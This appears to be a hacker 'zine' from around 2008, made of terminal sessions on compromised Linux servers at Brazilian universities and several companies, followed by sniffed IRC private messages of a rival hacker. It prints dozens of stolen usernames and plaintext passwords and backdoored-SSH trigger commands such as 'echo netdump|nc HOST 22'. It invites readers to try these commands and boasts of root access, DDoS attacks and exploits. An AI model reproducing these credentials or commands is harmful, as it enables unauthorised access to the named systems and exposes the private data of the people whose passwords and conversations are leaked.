### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux users 2.6.23-gentoo i686 ****

root@users:~#
root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
10:49:08 up 171 days, 22:37, 1 user, load average: 0.20, 0.24, 0.21
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 10:46 0.00s 0.44s 0.00s w
inet addr:192.168.253.3 Bcast:192.168.253.255 Mask:255.255.255.0
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
inet addr:169.254.78.132 Bcast:169.254.255.255 Mask:255.255.0.0
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
inet addr:212.111.196.163 Bcast:212.111.196.191 Mask:255.255.255.224
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
inet addr:212.26.143.6 Bcast:212.26.143.7 Mask:255.255.255.252
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 212.143.216.226 22
Trying 212.143.216.226...
Connected to 212.143.216.226.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this.
pam_from: 62.219.238.196 user: root pass: QWERFcxz (mail2.tikalnetworks.com) ----->>>>>>>> no kidding.

central@labsec [~xoxox/h3h3] # ssh root@212.143.216.226
root@212.143.216.226's password:

jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet
Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux
09:58:11 up 3 days, 18:03, 1 user, load average: 1.29, 1.16, 1.08
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 09:34 16:19 0.32s 0.30s ssh 10.0.0.3
inet addr:10.0.0.253 Bcast:10.0.0.255 Mask:255.255.255.0
inet addr:127.0.0.1 Mask:255.0.0.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep OUT
SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br)
SSH2_OUT: 143.107.133.233 user: pdborges pass: mipa0529 (aegir.if.usp.br)
SSH2_OUT: 143.106.42.243 user: luana pass: 103174b (athenas.cna.unicamp.br)
SSH2_OUT: 143.107.133.8 user: kpp pass: fth6mdy (landauer.if.usp.br)
SSH2_OUT: 143.107.133.47 user: luana pass: 103174b (schroedinger.if.usp.br)
SSH2_OUT: 143.107.133.76 user: mvarella pass: CH3Ftri (planck.if.usp.br)
SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br)
SSH2_OUT: 143.107.133.47 user: cedric pass: KunD1cka (schroedinger.if.usp.br)

central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep from|grep -v bullshit
pass_from: 143.107.133.244 user: hmf18 pass: xpx9b15+ (turista.if.usp.br)
pass_from: 201.52.218.156 user: cedric pass: P1chona04 (c934da9c.virtua.com.br)
pass_from: 201.82.105.213 user: mfsoares pass: 3p1t@xy (c95269d5.virtua.com.br)
pass_from: 189.34.88.209 user: kpp pass: mdc6gpt (bd2258d1.virtua.com.br)
pass_from: 189.102.19.167 user: pontes pass: r@s&09* (bd6613a7.virtua.com.br)
pass_from: 189.102.98.126 user: lassali pass: las2008ro (bd66627e.virtua.com.br)



central@labsec [~xoxox/h3h3] # ssh root@143.107.133.103 'uname -a'
root@143.107.133.103's password:

Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.144.186.37 22
Trying 200.144.186.37...
Connected to shark.lcca.usp.br (200.144.186.37).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages
SSH2_OUT: 127.0.0.1 user: root pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> just got tired, u knoW
SSH2_OUT: 127.0.0.1 user: amazonas pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im almost stopping pasting stuff

-> alot of kool shit regarding usp.br here
try yourself-> echo netdump|nc 200.144.186.37 22|grep usp.br
or just grep OUT

kthxnpurwelcome

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep localhost
SSH2_OUT: 127.0.0.1 user: root pass: ArmY1*00 (localhost) ->>>>>>>>>>>>>>>>> im glad you are here :) kind of makes it easy

central@labsec [~xoxox/h3h3] # ssh root@200.145.203.74
root@200.145.203.74's password:

Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux hobbes 2.6.18-6-686 i686 ****

root@hobbes:~#
root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
05:47:44 up 27 days, 15:12, 1 user, load average: 0.21, 0.15, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
rico :0 - 06Aug08 ?xdm? 5:39 0.71s x-session-manager
inet addr:200.145.203.74 Bcast:200.145.203.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
root@hobbes:~#

central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep unesp
pass_from: 200.145.203.42 user: rico pass: so31fia12 (nemo.df.ibilce.unesp.br)
SSH2_OUT: 200.145.203.42 user: ronaldo pass: LANmu80 (nemo.df.ibilce.unesp.br)

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 67.15.56.12 22
Trying 67.15.56.12...
Connected to 67.15.56.12.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9
netdump
SSH2_OUT: 127.0.0.1 user: root pass: l3nny1nt3l (localhost)
SSH2_OUT: 127.0.0.1 user: lenny pass: l3nny1nt3l (localhost)
pass_from: 76.188.180.141 user: joe pass: 1207j0s3ph7ys0n9813 (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141 user: devel pass: ha1W0;rlD.0121 (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141 user: celtrust pass: 1207j0s3ph9813 (cpe-76-188-180-141.neo.res.rr.com)



central@labsec [~xoxox/h3h3] # ssh root@67.15.56.12
root@67.15.56.12's password:

Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux f1.celtrust.com 2.6.9-34.ELsmp i686 ****

[root[@f1 ~]#
[root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
Linux f1.celtrust.com 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
05:20:15 up 153 days, 9:30, 0 users, load average: 2.62, 1.27, 0.63
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:67.15.56.12 Bcast:67.15.57.255 Mask:255.255.254.0
inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
inet addr:67.15.57.240 Bcast:67.15.57.255 Mask:255.255.255.0
inet addr:67.15.57.241 Bcast:67.15.57.255 Mask:255.255.255.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@66.119.174.19
root@66.119.174.19's password:



**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux res1.van.metrobridge.net 2.6.18-5-686 i686 ****

root@res1:~#
root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux res1.van.metrobridge.net 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
12:54:34 up 315 days, 17:40, 4 users, load average: 0.58, 0.35, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sky pts/0 66.119.176.2 11:41 1:12 0.00s 0.00s -bash
sky pts/3 66.119.176.2 Tue15 20:53 0.18s 0.00s sshd: sky [priv]
sky pts/6 66.119.176.2 11:42 1:10 0.16s 0.01s sshd: sky [priv]
vee pts/7 74.221.143.3 12:23 28:41m 0.07s 0.00s telnet seton-3550
inet addr:66.119.174.4 Bcast:66.119.174.15 Mask:255.255.255.240
inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link
inet addr:66.119.174.29 Bcast:66.119.174.31 Mask:255.255.255.240
inet addr:65.39.152.235 Bcast:65.39.152.255 Mask:255.255.255.224
inet addr:65.39.152.237 Bcast:65.39.152.255 Mask:255.255.255.224
inet addr:66.119.174.19 Bcast:66.119.174.31 Mask:255.255.255.240
inet addr:65.39.152.239 Bcast:65.39.152.255 Mask:255.255.255.224
inet addr:66.119.174.3 Bcast:66.119.174.15 Mask:255.255.255.240
inet addr:66.119.174.2 Bcast:66.119.174.15 Mask:255.255.255.240

pass_from: 66.119.176.2 user: simon pass: pass77 (mail.metrobridge.com) [whole metrobridge with the same pass]
pass_from: 66.119.176.2 user: sky pass: rotoFro7 (mail.metrobridge.com) [whole metrobridge with the same pass]

have fun

- what a shame.. again, metrobridge ? i told you to keep on eye on your sshd since your zine :(


-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@200.239.200.102
root@200.239.200.102's password:

Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br
Linux 2.6.11.12-ul1.

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux proxy2-rj 2.6.11.12-ul1 i686 ****

root@proxy2-rj:~#
root@proxy2-rj:~# uname -a;hostname -f;w
Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown
proxy2-rj.pop-rio.com.br
17:14:22 up 97 days, 5:09, 0 users, load average: 2.16, 1.88, 1.76
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root@proxy2-rj:~#
root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq
pass_from: 200.239.245.50 user: root pass: Beth01@ (gwpr03.microlink.com.br)
pass_from: 200.239.245.70 user: root pass: pa$$w0rd (Froes.microlink.com.br)
root@proxy2-rj:~# ./sshread mac.h|grep OUT
SSH2_OUT: 127.0.0.1 user: root pass: BuCaaAadd (localhost) -----> /me laughs

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@143.107.250.214
root@143.107.250.214's password:

Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br

..... !! HELLO WORLD !! .....

@@@@@@ @@@@@@
@@ @@ @@ @@
@@ @@ @@ @@@ @@ @@ @@ @@@ @@ @@
@@ @@ @@ @ @@ @@ @@ @@ @ @@ @@ @@
IIII II I II IIII II I II IIII
IIII III II IIII III II IIII
II II II II II II II II II II
II II IIIIII II II IIIIII II II
**** Linux noelrosa.iq.usp.br 2.6.9-42.0.10.EL x86_64 **** ->>>> new kool motd, n1cE rIpZ

[root[@noelrosa ~]#

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
-;;;;;;; i think thats enough to paste, right ?
-;;;;;; anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got from them

-/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/

r47 is r47@bl4ckh47.org * i own u! [and We own you!]
r47 on @#combat #osiris @#/<-rad
r47 using irc.ipv6.he.net Hurricane Electric IPV6 IRC Server
r47 actually using host 2001:470:1f15:42b::3
r47 End of /WHOIS list.

central@labsec [~xoxox/h3h3] # ssh root@bl4ckh47.org -p 2222 bash

root@bl4ckh47.org's password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz)
uname -a;w;hostname -f
Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux
10:13:26 up 162 days, 8:25, 0 users, load average: 0.04, 0.05, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
VoIP.eurosignal.cz

sit0 Link encap:IPv6-in-IPv4
inet6 addr: ::10.0.2.254/96 Scope:Compat
inet6 addr: ::127.0.0.1/96 Scope:Unknown
inet6 addr: ::10.0.2.4/96 Scope:Compat
inet6 addr: ::77.78.84.242/96 Scope:Compat
UP RUNNING NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

sit1 Link encap:IPv6-in-IPv4
inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
inet6 addr: fe80::a00:2fe/64 Scope:Link
inet6 addr: fe80::a00:204/64 Scope:Link
inet6 addr: fe80::4d4e:54f2/64 Scope:Link
UP POINTOPOINT RUNNING NOARP MTU:1480 Metric:1
RX packets:16700 errors:0 dropped:0 overruns:0 frame:0
TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1677861 (1.6 MiB) TX bytes:982003 (958.9 KiB)

tcp 0 0 77.48.84.242:65535 189.4.189.139:61593 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED

perl 12655 root 4u IPv4 3027913 TCP *:65535 (LISTEN)
root 12655 0.0 0.3 5256 3220 ? S Mar19 2:39 supervise log
- nice process name btw
- lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks -

<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :u know d0n
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he took my nick
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he's packeting me
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :;\
-> PRIVMSG d0n_ :d0n No such nick/channel
-> PRIVMSG d0n_ :d0n End of /WHOIS list.
-> PRIVMSG d0n_ :change
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :lamer :(
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :owns my dsl
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :real leet
-> PRIVMSG d0n :who ?
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :that d0n guy
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :had my nick
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :was talking shit
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :"here comes the ddos" he said
-> PRIVMSG d0n :fuck
-> PRIVMSG d0n :lets hack him
-> PRIVMSG d0n :not hard target
-> PRIVMSG d0n :hehehe
-> PRIVMSG d0n :to me
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HHEHEHEEH\
-> PRIVMSG d0n ::>:>:>:>
-> PRIVMSG d0n :sup bitchx
-> PRIVMSG d0n ::>
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 ::)
-> PRIVMSG d0n :bitchx bugged
-> PRIVMSG d0n :do u use it ?
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :the client?
-> PRIVMSG d0n :yah
-> PRIVMSG d0n :0dayz
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :no shit..
-> PRIVMSG d0n :eheh

*********************** run to the hillz he h4s b1tchx 0d4y **********************

-> PRIVMSG d0n :i have windows on linux (vmware) ->>>>>>>>>>>>>>>>>>>>> lies
-> PRIVMSG d0n :hjmm
-> PRIVMSG d0n :;>
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :ah yeah
-> PRIVMSG d0n :omfg
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :any more fun with efnet soon?
-> PRIVMSG d0n :im still drunked
-> PRIVMSG d0n :no more
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HEHE
-> PRIVMSG d0n :im stoped with x0x0x
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :;p
-> PRIVMSG d0n :just sniffing idiots now ->>>>>>>>>>>>>>>>>>>> so we are

*********************** /laugh time ********************************************
-> PRIVMSG accuser :nem
-> PRIVMSG accuser :nao me comunico mais com povo br ->>>>>>>>>>>>>>>>>>>>
-> PRIVMSG accuser :nao eh meu nivel
-> PRIVMSG accuser :so alguns amigos
-> PRIVMSG accuser :nego roubo meu canal ontem ->>>>>>>>>>>>>>>>>>>> some guyz stole my network baby
-> PRIVMSG accuser :recuperei
-> PRIVMSG accuser :e tomei o nick deles ->>>>>>>>>>>>>>>>>>>> i ddosed them and got their nicks
-> PRIVMSG accuser :/w psys
-> PRIVMSG accuser :/w dtr
-> PRIVMSG accuser :hehehe ->>>>>>>>>>>>>>>>>>>> now i feel gr8
<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :eu vi
<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :o psys tacando monte de bot
-> PRIVMSG accuser :comigo eh dificil um br poder ->>>>>>>>>>>>>>>>>>>> HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x)
-> PRIVMSG accuser :hehehe
-> PRIVMSG accuser :eu mando! ->>>>>>>>>>>>>>>>>>>> im THE guy!
-> PRIVMSG accuser :eu to mo fora de guerra cara
-> PRIVMSG accuser :mas parece q os caras me perseguem
-> PRIVMSG accuser :e sismam q sou lamer ->>>>>>>>>>>>>>>>>>>> /me laughs
-> PRIVMSG accuser :rs

-> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47 ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks for sharing
-> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax ->>>>>>>>>>>>>>>>>>>> 3h3h3h3

<- :KoaL4!h@216.75.56.186 PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
-> PRIVMSG KoaL4 :cara
-> PRIVMSG KoaL4 :vou
-> PRIVMSG KoaL4 :mas nao me atrapalha
-> PRIVMSG KoaL4 :to aki programando
-> PRIVMSG KoaL4 :pra um cliente chato pra kct

<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :ta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :arrumando truta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com os cara da defland pq
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :falaram meu nome em vao
-> PRIVMSG \g4br13l\ :nao qro isso
-> PRIVMSG \g4br13l\ :so isso
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :r47
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :tu se esquenta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com bobagem
-> PRIVMSG \g4br13l\ :hehee
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :nao qro pivete
-> PRIVMSG \g4br13l\ :de merda
-> PRIVMSG \g4br13l\ :kiddie
-> PRIVMSG \g4br13l\ :falando de mim
-> PRIVMSG \g4br13l\ :pq qm manda ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ :sou eu ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :esse univie.ac.at eh show
-> PRIVMSG \g4br13l\ :tenho a www la
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :usam checkpoint firewall one ----->>>>>>>>>>>>> what the fuck ?
-> PRIVMSG \g4br13l\ :tunnelling by trace ----->>>>>>>>>>>>> ?!?1
-> PRIVMSG \g4br13l\ :mto dificil pacota-la


*********************** boyfriends are fighting - portuguese only, sorry **********************
-> PRIVMSG #thc :skotch is gay
-> PRIVMSG skotch :eai vagabunda
-> PRIVMSG skotch :vai fica na putaria ateh qdo
-> PRIVMSG skotch :to cheio de novidades
-> PRIVMSG skotch :e para de me chamar de verme
-> PRIVMSG skotch :rs
<- ::skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no meu nextel -> gtfo
-> PRIVMSG skotch :ahahaha
-> PRIVMSG skotch :vc tem certeza ->>>>>>>>> are you sure baby ?
-> PRIVMSG skotch :entao eh isso ?
-> PRIVMSG skotch :ja era ?:
-> PRIVMSG skotch :ja era ?
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :sim
-> PRIVMSG skotch :eu nao vou voltar aki denovo
-> PRIVMSG skotch :pra falar com vc
-> PRIVMSG skotch :ja era ?
-> PRIVMSG skotch :CERTEZA? ->>>>>>>> are you sure we are breaking apart?????
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha faz tempo
-> PRIVMSG skotch :to na minha tb
-> PRIVMSG skotch :so acho
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vc fala merda e dps

  
quer voltar a tras
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :coisa de mlk
-> PRIVMSG skotch :filho
-> PRIVMSG skotch :eu so acho
-> PRIVMSG skotch :q eh besteira
-> PRIVMSG skotch :agente brigasr por isso
-> PRIVMSG skotch :so isso
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :mermao n eh a primeira vez
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tu da dessas
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vem falando bosta
:skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e dps vem se desculpando
-> PRIVMSG skotch :so joguei um verde
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n so esses verme de merda
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q paga pau pra vc
-> PRIVMSG skotch :nao vou fazer isso denovo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q aceita tudo q vc fala
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :nao falei q tu paga sapo pra mim
-> PRIVMSG skotch :tu tb
-> PRIVMSG skotch :eh cheio das noia q nem eu
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :tu soh mostro q n confia
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :axando q eu passo maq pra xscholler
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :aff
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu some
-> PRIVMSG skotch :so joguei um verde
-> PRIVMSG skotch :se nao confiasse
-> PRIVMSG skotch :tu nao tinha
-> PRIVMSG skotch :tds minhas box
-> PRIVMSG skotch :TODAS
-> PRIVMSG skotch :fdp
-> PRIVMSG skotch :outra coisa
-> PRIVMSG skotch :descobri
-> PRIVMSG skotch :o klux
-> PRIVMSG skotch :tem root na importec ->>>>>> klux has root in importec[their box] (you are right sir!)
-> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE ->>>>>> dont use it as bounce anymore! (kinda late)
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
-> PRIVMSG skotch :pra sniffa
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n to usando mais importec faz tempo
-> PRIVMSG skotch :fica ligeiro
-> PRIVMSG skotch :eu formatei ele
-> PRIVMSG skotch :deproposito
-> PRIVMSG skotch :ele veio no meu pvt
-> PRIVMSG skotch :colo uma pa de merda
-> PRIVMSG skotch :ele sabe da ig
-> PRIVMSG skotch :da locaweb
-> PRIVMSG skotch :da pop
-> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e vice versa
-> PRIVMSG skotch :q seja
-> PRIVMSG skotch :ouytra coisa
-> PRIVMSG skotch :peguei coisa quente
-> PRIVMSG skotch :sshd
-> PRIVMSG skotch :hehehe
-> PRIVMSG skotch :remote expl
-> PRIVMSG skotch :openbsd local ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole)
-> PRIVMSG skotch :tu fica de putaria
-> PRIVMSG skotch :agente perdendo tempo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :o openbsd vc a mando faz tempo
-> PRIVMSG skotch :mas esse novo nao
-> PRIVMSG skotch :entra na merda do msn
